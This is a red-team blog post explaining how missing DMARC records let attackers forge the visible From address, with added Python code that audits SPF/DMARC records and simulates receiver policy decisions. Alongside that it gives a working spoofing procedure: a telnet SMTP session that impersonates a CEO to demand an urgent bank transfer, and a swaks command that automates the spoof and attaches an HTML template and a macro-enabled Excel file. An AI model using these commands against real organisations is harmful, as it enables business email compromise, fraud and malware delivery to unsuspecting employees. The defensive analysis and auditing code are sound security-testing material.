# Long Live DMARC - Email Spoof issues

![Email Spoof Attack Components](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MDtkWzdvgRTZWDjfsGa%2Fuploads%2FeVPhVkAju4BbpKGQeyrL%2Fimage.png?alt=media\&token=5ee2c256-6466-4a82-9dfb-7d03668bc596)

Recently, during my research, I came across an organization that was using O365 for email. During the initial recon I skipped over the fact that they didn't have DMARC; it only clicked when I was reading over my notes.

**Background Info:**

Email Provider: O365

SPF: Exists (`v=spf1 ip4:192.168.0.0/24 -all`)

DMARC: Does not exist

If you don't like nslookup commands, you can check this on MXToolbox as well.

![DMARC of the domain doesn't exist](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MDtkWzdvgRTZWDjfsGa%2Fuploads%2FksNp8KDNi9rlJrwNmip8%2Fimage.png?alt=media\&token=b297114f-4122-4713-8357-2e666fc4128b)

**TIP**: If a DMARC record does exist, check whether `p=none` is set. `p=none` means the policy is monitor-only: neither reject nor quarantine is enforced, so spoofed mail is still delivered.
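To make the same check repeatable, here is an added example (not from the original post) that audits the SPF and DMARC TXT records of a domain and flags the conditions this post cares about: a missing DMARC record, `p=none`, and a few related weak settings. Records are passed in as strings so it runs offline; in practice you fetch them with `dig TXT orgname.com` and `dig TXT _dmarc.orgname.com` (or nslookup, as above). The SPF string is the page's own, the hardened DMARC record is constructed, and the `audit` / `parse_dmarc` / `MailAuthFindings` names are this example's own.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class MailAuthFindings:
    spf: Optional[str]                 # the v=spf1 record, if exactly one was found
    dmarc: Optional[Dict[str, str]]    # parsed _dmarc tags, if a record was found
    issues: List[str] = field(default_factory=list)

    @property
    def from_header_spoofable(self) -> bool:
        """No DMARC record, or p=none: receivers have nothing to enforce on the
        header From domain, which is exactly the gap the post describes."""
        return self.dmarc is None or self.dmarc.get("p", "none").lower() == "none"


def parse_dmarc(record: str) -> Dict[str, str]:
    """Turn 'v=DMARC1; p=none; rua=mailto:...' into a lower-cased tag -> value dict."""
    tags: Dict[str, str] = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def audit(spf_txt: List[str], dmarc_txt: List[str]) -> MailAuthFindings:
    """spf_txt: TXT strings published at <domain>; dmarc_txt: TXT strings at _dmarc.<domain>."""
    spf_records = [r for r in spf_txt if r.strip().lower().startswith("v=spf1")]
    dmarc_records = [r for r in dmarc_txt if r.strip().lower().startswith("v=dmarc1")]
    findings = MailAuthFindings(spf=spf_records[0] if len(spf_records) == 1 else None, dmarc=None)

    # SPF only protects the envelope MAIL FROM domain, and only if it is strict.
    if not spf_records:
        findings.issues.append("no SPF record: the MAIL FROM domain cannot be authenticated")
    elif len(spf_records) > 1:
        findings.issues.append("multiple SPF records: receivers evaluate this as permerror")
    else:
        last = spf_records[0].split()[-1].lower()
        if last in ("all", "+all"):
            findings.issues.append("SPF ends in +all: every sending host passes")
        elif last == "~all":
            findings.issues.append("SPF ends in ~all: softfail is usually only marked, not rejected")
        elif last == "?all":
            findings.issues.append("SPF ends in ?all: neutral, equivalent to no SPF check")

    # DMARC is the only mechanism that ties the visible From header to SPF/DKIM.
    if not dmarc_records:
        findings.issues.append("no DMARC record: header From alignment is never enforced")
        return findings
    findings.dmarc = parse_dmarc(dmarc_records[0])
    policy = findings.dmarc.get("p", "none").lower()
    if policy == "none":
        findings.issues.append("DMARC p=none: monitor only, a forged From is still delivered")
    pct = int(findings.dmarc.get("pct", "100"))
    if policy != "none" and pct < 100:
        findings.issues.append(f"DMARC pct={pct}: policy applied to only {pct}% of failing mail")
    if policy != "none" and findings.dmarc.get("sp", policy).lower() == "none":
        findings.issues.append("DMARC sp=none: subdomains of the org can still be spoofed")
    if "rua" not in findings.dmarc:
        findings.issues.append("DMARC has no rua=: nobody receives aggregate reports of spoofing attempts")
    return findings


if __name__ == "__main__":
    # Constructed sample: the SPF record from the post, and no _dmarc TXT record at all.
    target = audit(["v=spf1 ip4:192.168.0.0/24 -all"], [])
    print("target org:", "SPOOFABLE" if target.from_header_spoofable else "protected", target.issues)

    # Constructed hardened counterpart: same SPF plus an enforcing DMARC policy with reporting.
    hardened = audit(["v=spf1 ip4:192.168.0.0/24 -all"],
                     ["v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com"])
    print("hardened:", "SPOOFABLE" if hardened.from_header_spoofable else "protected", hardened.issues)
```

Note that a strict `-all` SPF record, as the target org had, changes nothing for the From header: the audit reports the org as spoofable purely because the `_dmarc` record is missing.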

**Technical Background**

An email consists of two parts, the SMTP envelope and the message data. Below is a pictorial representation.

![Breakdown of two parts of an email](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MDtkWzdvgRTZWDjfsGa%2Fuploads%2F4i9Py16KR80SKBbabT4A%2Fimage.png?alt=media\&token=0545c5eb-d18b-42ac-91dc-2f4398630f84)

SPF: verifies that the connecting server is authorised by the SPF record of the envelope domain (HELO/EHLO and MAIL FROM)

DKIM: verifies the DKIM-Signature header that the sending domain added to the message

DMARC: checks alignment between the header 'From' domain and the 'Mail From' domain that SPF authenticated (or the DKIM signing domain), and publishes the policy (none, quarantine, reject) to apply when they don't align

![SPF and DKIM verification fields](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MDtkWzdvgRTZWDjfsGa%2Fuploads%2FKYwmGlKU26bIWXfZDidp%2Fimage.png?alt=media\&token=27035681-8d12-467e-939a-2ee42858e543)

<mark style="background-color:yellow;">In conclusion, if DMARC isn't present, nothing makes the receiver enforce alignment between the 'MAIL FROM' and 'FROM' fields. Since the receiving user only sees 'FROM', an attacker is free to forge it. Simply put, an attacker can put any email address he likes in the 'FROM' field, and the receiving user will see the email as coming from that forged 'FROM' address.</mark>
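To make the conclusion concrete, here is an added example (not from the original post) of the decision a DMARC-aware receiver makes: it takes the header From, the envelope MAIL FROM with its SPF result, the d= domain of any passing DKIM signature, and the parsed `_dmarc` record of the From domain, and reports the disposition. The sample messages are constructed from the scenario on this page (`orgname.com` is the post's placeholder for the target, `fook.redteam.cafe` its spoofing subdomain); `org_domain` uses a two-label heuristic instead of the Public Suffix List that real receivers use, an assumption also noted in the code.

```python
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class Message:
    header_from: str            # RFC 5322 From: the address the user sees
    mail_from: str              # RFC 5321 MAIL FROM: the envelope sender SPF checks
    spf_pass: bool              # SPF result for the MAIL FROM domain
    dkim_domain: Optional[str]  # d= of a passing DKIM signature, None if unsigned/failed


def domain_of(address: str) -> str:
    return address.rsplit("@", 1)[-1].lower().rstrip(".")


def org_domain(domain: str) -> str:
    """Organizational domain for relaxed alignment. Assumption: the last two labels;
    real receivers consult the Public Suffix List (this heuristic is wrong for e.g. .co.uk)."""
    return ".".join(domain.lower().split(".")[-2:])


def aligned(from_domain: str, auth_domain: Optional[str], mode: str) -> bool:
    """DMARC identifier alignment: 's' = strict (exact match), 'r' = relaxed
    (same organizational domain). aspf/adkim default to relaxed."""
    if not auth_domain:
        return False
    if mode.lower() == "s":
        return from_domain == auth_domain.lower()
    return org_domain(from_domain) == org_domain(auth_domain)


def dmarc_disposition(msg: Message, policy: Optional[Dict[str, str]]) -> str:
    """What the receiver does with msg under the From domain's DMARC record.
    Returns 'absent' (no record: nothing enforced, the post's case), 'pass', or the
    record's p= value ('none', 'quarantine', 'reject') when no identifier aligns."""
    from_domain = domain_of(msg.header_from)
    if policy is None:
        return "absent"
    spf_aligned = msg.spf_pass and aligned(from_domain, domain_of(msg.mail_from), policy.get("aspf", "r"))
    dkim_aligned = aligned(from_domain, msg.dkim_domain, policy.get("adkim", "r"))
    if spf_aligned or dkim_aligned:
        return "pass"
    return policy.get("p", "none").lower()


if __name__ == "__main__":
    # Constructed: the post's spoof. SPF passes, because the sender controls the SPF
    # record of fook.redteam.cafe, but that identity does not align with the From header.
    spoof = Message("ceo@orgname.com", "attacker@fook.redteam.cafe", spf_pass=True, dkim_domain=None)
    for label, policy in [("no DMARC", None), ("p=none", {"p": "none"}), ("p=reject", {"p": "reject"})]:
        print(f"{label:9} -> {dmarc_disposition(spoof, policy)}")

    # Constructed: legitimate mail with bounces on a subdomain passes under relaxed alignment only.
    legit = Message("ceo@orgname.com", "bounces@mail.orgname.com", spf_pass=True, dkim_domain=None)
    print("legit relaxed ->", dmarc_disposition(legit, {"p": "reject"}))
    print("legit strict  ->", dmarc_disposition(legit, {"p": "reject", "aspf": "s"}))
```

The spoof is rejected only once the From domain publishes `p=reject` (or quarantined under `p=quarantine`); with no record or `p=none` it is delivered exactly as the post describes. The `legit` cases show why publishing a policy has to be done carefully: strict `aspf=s` rejects the org's own mail if its bounce domain is a subdomain, which is what the `rua=` reports from a `p=none` rollout phase are meant to catch before enforcing.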

**Current Exploitation Methods:**

Quick guides I found on exploiting the missing-DMARC issue, also known as "SPF-BYPASS", are as follows:

<https://github.com/Rices/spf-bypass>

<https://o365info.com/how-to-simulate-spoof-e-mail-attack-and-bypass-spf-sender-verification-part2-of-2/>&#x20;

**Info Extract from the above methods**&#x20;

So, to spoof, the following actions must be performed:

Step 1: Buy a domain or configure a subdomain (I'll be using a subdomain: fook.redteam.cafe).

Step 2: Get a VPS that allows outbound SMTP. I'm using DigitalOcean.

Step 3: Set the right SPF record on the domain, for example `v=spf1 mx a ip4:<DigitalOcean IP> -all`.

Step 4: Connect via telnet to the target's SMTP server. My target org used Office 365, so we'll telnet to orgname-com.mail.protection.outlook.com:

```
telnet orgname-com.mail.protection.outlook.com 25
```

Step 5: Perform the actions below:

```
ehlo fook.redteam.cafe
MAIL FROM: attacker@fook.redteam.cafe
RCPT To: victim@orgname.com
data
from: "CEO ORG" <ceo@orgname.com>
to: <victim@orgname.com>
subject: transfer money urgently

Hey send me money at bank account 123456789

.
```

Enjoy the profit

**Missing Automation** 🤷‍♂️

So all this is good and everything, but where the hell is the automation? As a red teamer, I asked myself these questions:

1. Where is the automation? Do I send an email by telnet to all my victims? That's boring.
2. How do I send an HTML email?
3. How do I send an attachment with my email?

After looking at many telnet automation scripts, I was frustrated. I decided to use SWAKS, the Swiss Army knife for email.

Instead of doing loads of telnet and manually encoding messages, let's run this sweet command and be done:

```
./swaks --ehlo fook.redteam.cafe --from attacker@mail.redteam.cafe --to victim@orgname.com --server orgname-com.mail.protection.outlook.com --h-From '"CEO  ORG" <ceo@orgname.com>' --attach-type text/html --attach-body @Mail-Template.html --attach macroexcel.xlsm --attach-type text/html
```

**Is this something new?**

Probably not. You must have heard about this 100 years ago.

**How can I find more issues in the email delivery system?**

Well, there is of course the manual way: `dig` for the SPF, DMARC and DKIM records. You can also just go to [caniphish.com](https://caniphish.com) for a quicker way in.

**Super Useful Research**

While doing some google-fu, I found two very useful projects to test mail delivery systems.

MailSploit - <https://github.com/pwnsdx/Mailsploit>

espoofer - <https://github.com/chenjj/espoofer>

These projects will help you discover issues in mail delivery systems. You may even get a 0-day in your pocket 🤷‍♂️ if you choose the right target. Shhhhh

**References:**

Amazing Black Hat talk

<https://www.blackhat.com/us-20/briefings/schedule/#you-have-no-idea-who-sent-that-email--attacks-on-email-sender-authentication-19902>
